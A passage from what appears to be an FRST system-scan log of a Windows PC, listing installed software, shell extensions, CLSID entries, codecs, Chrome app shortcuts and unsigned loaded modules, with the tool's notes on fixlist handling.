Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 72.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 72.0.2 (x64 cs)) (Version: 72.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 68.1.2 - Mozilla)
Mozilla Thunderbird 68.12.1 (x86 cs) (HKLM-x32\...\Mozilla Thunderbird 68.12.1 (x86 cs)) (Version: 68.12.1 - Mozilla)
MSI Development Tools (HKLM-x32\...\{973CACA2-E018-065B-0580-F2784802E299}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
MY.GAMES GameCenter (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\GameCenter) (Version: 4.1561 - MY.COM B.V.)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2013 - slovenčina (HKLM\...\{90150000-001F-041B-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4393.1001 - Microsoft Corporation)
Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 2.1.0 - Nexon)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.7 - Notepad++ Team)
Npcap (HKLM-x32\...\NpcapInst) (Version: 0.9990 - Nmap Project)
Nuked Cockroach Launcher 0.9.12 (HKLM-x32\...\Nuked Cockroach Launcher) (Version: 0.9.12 - Nuked Cockroach Studio)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Miracast Virtual Audio 378.78 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 378.78 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{C5C1C0F0-D62F-4DBF-81D4-D7EF397C228B}) (Version: 9.09.0814 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
odrive (HKLM\...\{32AA7EE2-2DA0-4CD9-ACD1-5D205E7A3F63}) (Version: 1.00.6236 - Oxygen Cloud, Inc.) Hidden
odrive (HKLM-x32\...\{e6ab88b8-5dd2-44c5-8ef1-6c2a7b48199b}) (Version: 1.0.6236 - Oxygen Cloud, Inc.)
Open 3D Model Viewer (HKLM-x32\...\{EBDFEC36-5277-454F-875B-F0AA2CDC3C92}) (Version: 1.10.0000 - Alexander Gessler)
Origin91 (HKLM-x32\...\{ADC55813-F4DD-47AA-94F3-CA35E1447E26}) (Version: 9.10.00 - OriginLab Corporation)
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden
PotPlayer-64 bit (HKLM\...\PotPlayer64) (Version: 200525 - Kakao Corp.)
PowDLL Converter 2.86 (HKLM-x32\...\PowDLL Converter) (Version: 2.86 - Nikolaos Kourkoumelis)
PPspliT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\PPspliT) (Version: 1.17 - )
Profex (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{d7553a1d-aae9-4f43-a693-9dcc4e118c61}) (Version: 4.0.0 - doebelin.org)
Prusa3D version 2.2.9.1 (HKLM\...\Prusa3D_is1) (Version: 2.2.9.1 - Prusa Research a.s.)
PrusaSlicer version 2.2.0 (HKLM\...\PrusaSlicer_is1) (Version: 2.2.0 - Prusa Research s.r.o.)
PureRef (HKLM-x32\...\PureRef) (Version: 1.9.2 - Idyllic Pixel)
Python 3.7.5 (64-bit) (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\{5e6d7bfa-46e9-4496-9ccd-e15816be8f0a}) (Version: 3.7.5150.0 - Python Software Foundation)
Python 3.7.5 Core Interpreter (64-bit) (HKLM\...\{6DC6BC71-F1FB-412D-A16A-2FE8C463E89F}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Development Libraries (64-bit) (HKLM\...\{5A54B213-36D8-40CB-9E55-D20864AEF3C8}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Executables (64-bit) (HKLM\...\{8864B390-4DFB-43AB-934B-F02C48577666}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 pip Bootstrap (64-bit) (HKLM\...\{2E590D5A-4E40-4C9C-AFF8-7CB80F085752}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Standard Library (64-bit) (HKLM\...\{45CB356A-C0DF-430E-B75F-7764DBA06DF9}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
Python 3.7.5 Utility Scripts (64-bit) (HKLM\...\{EFF40415-0D5B-4CBA-9080-3EE2DADB527C}) (Version: 3.7.5150.0 - Python Software Foundation) Hidden
qBittorrent 4.2.1 (HKLM-x32\...\qBittorrent) (Version: 4.2.1 - The qBittorrent project)
R for Windows 3.5.0 (HKLM\...\R for Windows 3.5.0_is1) (Version: 3.5.0 - R Core Team)
RDT (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\RDT) (Version: 0.7.28 - Gamers Net Inc)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8581 - Realtek Semiconductor Corp.)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.1.0.1120 - Samsung Electronics)
SDK ARM Additions (HKLM-x32\...\{7922BB77-0B59-840A-AC80-D560A34D75C5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{C87DF65C-A672-7E08-A083-E7D48FE8DB70}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
SigmaPlot 11.0 (HKLM-x32\...\{B1A88375-BAB9-4081-B58F-A137FC6ED2A4}) (Version: 11.0 - Systat Software, Inc.)
Skype version 8.63 (HKLM-x32\...\Skype_is1) (Version: 8.63 - Skype Technologies S.A.)
StarCraft II Legacy of the Void (HKLM\...\U3RhckNyYWZ0SUk=_is1) (Version: 1 - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StyleWriter 4 (HKLM-x32\...\{D770F0F3-650B-4D7A-945D-49ADB1182BD9}) (Version: 4.02.02 - Editor Software (UK) Ltd)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.8.3 - TeamViewer)
The Witcher 3: Wild Hunt - Game of the Year Edition (HKLM-x32\...\1495134320_is1) (Version: 1.32 - GOG.com)
They Are Billions (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\They Are Billions) (Version: - HOODLUM)
Universal CRT Extension SDK (HKLM-x32\...\{A5FA2886-1925-133F-0D41-B9A8ECEA0A2D}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{B739B4C5-EEEC-8E70-0276-38C4779AF398}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{A9D6F52C-694E-3E41-7AB8-5BEB644742A5}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{E053089E-7953-3219-814F-F485FC151C54}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{B9424F08-0617-C4F6-A798-5A9250C1A738}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{D261CEA1-AB8D-9CFA-4407-BCEFC78661AC}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB4486669) 64-Bit Edition (HKLM\...\{90160000-012B-0409-1000-0000000FF1CE}_Office16.PROPLUS_{5B5D9645-8189-4D87-9746-9C926AD6D404}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 98.0 - Ubisoft)
vcpp_crt.redist.clickonce (HKLM-x32\...\{16E08161-F78C-4FFC-8E12-F9BEA280795F}) (Version: 14.16.27012 - Microsoft Corporation) Hidden
Visual Studio Community 2017 (HKLM-x32\...\aa5cdd5f) (Version: 15.9.28307.222 - Microsoft Corporation)
Visuino version 7.8.3.69 (HKLM-x32\...\Visuino_is1) (Version: - Mitov Software LLC)
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.24-2 - Wacom Technology Corp.)
Warface My.Com (HKU\S-1-5-21-2643689781-145595849-2857803826-1001\...\Warface My.Com) (Version: 1.131 - MY.GAMES)
Wasteland 3 (HKLM-x32\...\Wasteland 3_is1) (Version: - )
WinAppDeploy (HKLM-x32\...\{9690D51C-4435-1C20-7819-66CCAB0F03F9}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Windows SDK AddOn (HKLM-x32\...\{350F0ECD-0783-4529-8797-98F0AD33EAC0}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.16299.15 (HKLM-x32\...\{6195c203-b53c-4bb7-983a-6070a902e704}) (Version: 10.1.16299.15 - Microsoft Corporation)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{385A1387-A488-9E90-3635-086129610034}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{D7DD3171-DA58-52A1-95B2-4769640855AF}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7336279F-8F8F-5530-A543-3BE963846C0A}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E414A474-0A87-4F66-C409-A4D9857CFD34}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{CE760B86-975B-F514-5673-0ED4332B801B}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{5E67F8BE-D8D2-257F-CE19-419A2D5125C7}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{A2AA063E-AF50-A1F5-8925-A06EB1556644}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{7D4C7F4A-02A9-E434-6451-C8787DF28C1F}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{BC467065-9374-5345-DA3F-FCF073304A25}) (Version: 10.1.16299.15 - Microsoft Corporation) Hidden
Wolfram Extras 11.0 (5597552) (HKLM\...\A-WIN-Extras 11.0.1 5597552_is1) (Version: 11.0.1 - Wolfram Research, Inc.)
Wolfram Mathematica 11 (M-WIN-L 11.0.1 5597744) (HKLM\...\M-WIN-L 11.0.1 5597744_is1) (Version: 11.0.1 - Wolfram Research, Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{2AD206F1-152C-4F9D-A24E-6F93FE7A4AFC}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\GrammarlyShim64.dll (Grammarly, Inc. -> CompanyName)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{35B08E96-DA1F-4321-BF80-D6B53C20F3CF}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4585263E-BEF5-4A39-A2E8-8F69E0054F0C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{4BE56754-B616-4998-B825-D16983AEE1B2}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Grammarly\Grammarly for Microsoft Office Suite\6.7.217\DA89310249\Grammarly.AddIn.Connect.ActiveX.dll (Grammarly, Inc. -> Grammarly)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel(R) pGFX -> Intel Corporation)
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\Tomika\AppData\Local\Autodesk\webdeploy\production\013be2658e0f76cf3bfa01262889994ea1c15a54\NPreview10.dll (Autodesk, Inc. -> )
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{E07BCA71-E88B-4A5E-BA46-69A52D6B9B20}\InprocServer32 -> C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll () [File not signed]
CustomCLSID: HKU\S-1-5-21-2643689781-145595849-2857803826-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems Incorporated -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ 0drive.Active] -> {4585263E-BEF5-4A39-A2E8-8F69E0054F0C} => C:\Users\Tomika\.odrive\bin\6729\x64\ActiveOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Locked] -> {E07BCA71-E88B-4A5E-BA46-69A52D6B9B20} => C:\Users\Tomika\.odrive\bin\6729\x64\LockedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ 0drive.Synced] -> {35B08E96-DA1F-4321-BF80-D6B53C20F3CF} => C:\Users\Tomika\.odrive\bin\6729\x64\SyncedOverlay.dll [2020-10-03] () [File not signed]
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2020-09-09] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers1: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-05-18] (Notepad++ -> )
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2020-09-09] (Google LLC -> Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Tomika\AppData\Local\MEGAsync\ShellExtX64.dll [2019-04-14] (Mega Limited -> )
ContextMenuHandlers5: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2020-01-01] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2019-11-21] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [ 0drive] -> {679ADC87-66BB-43BF-9DC3-3DE2E4A32B8C} => C:\Users\Tomika\.odrive\bin\6729\x64\ContextMenu.dll [2020-10-03] () [File not signed]
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Programy\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-06-10] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => D:\Programy\Adobe\Acrobat\Acrobat Elements\ContextMenuShim64.dll [2012-09-23] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.xvid] => C:\Windows\SysWOW64\xvidvfw.dll [235520 2017-12-08] () [File not signed]
HKLM\...\Drivers32: [vidc.x264] => C:\Windows\SysWOW64\x264vfw.dll [3850240 2017-07-30] (x264vfw project) [File not signed]
HKLM\...\Drivers32: [vidc.lags] => C:\Windows\SysWOW64\lagarith.dll [230080 2016-09-21] (Cole Williams Software Limited -> )
HKLM\...\Drivers32: [msacm.divxa32] => C:\Windows\SysWOW64\DivXa32.acm [291408 2013-12-17] (Packed With Joy !) [File not signed]

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Any.do.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=ocgddccilgpeepgglnlpchkpgamkgmld
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Google Keep – poznámky a seznamy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=hmjkmjkepdijhoojdojkdfohbdgmmhki
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome\Vysor.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=gidgenkbbabolejbgbpnhbimgjbffefm
ShortcutWithArgument: C:\Users\Tomika\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\bf33aa3a868e27f5\Any.do Extension.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default --app-id=kdadialhpiikehpdeejjeiikopddkjem

==================== Loaded Modules (Whitelisted) =============

2020-03-19 12:35 - 2017-04-17 10:43 - 003852800 ____N () [File not signed] C:\Program Files (x86)\Bloody7\Bloody7\Data\Mouse\Forms\Internet_Advertisement\Internet_Advertisement_DLL.dll
2020-10-05 22:07 - 2020-04-20 15:20 - 000092672 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ctypes.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000142336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_elementtree.pyd
2020-10-05 22:07 - 2020-04-20 15:22 - 001101824 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_hashlib.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000027648 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_multiprocessing.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000046592 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_socket.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 000050688 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_sqlite3.pyd
2020-10-05 22:07 - 2020-04-20 15:21 - 001422336 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\_ssl.pyd
2020-10-05 22:07 - 2015-06-11 05:34 - 000729088 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\apsw.pyd
2020-10-05 22:07 - 2020-04-20 15:20 - 000071168 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\bz2.pyd
2020-10-05 22:07 - 2020-01-31 09:31 - 000029184 _____ () [File not signed] C:\Users\Tomika\.odrive\bin\6729\Crypto.Cipher._AES.pyd
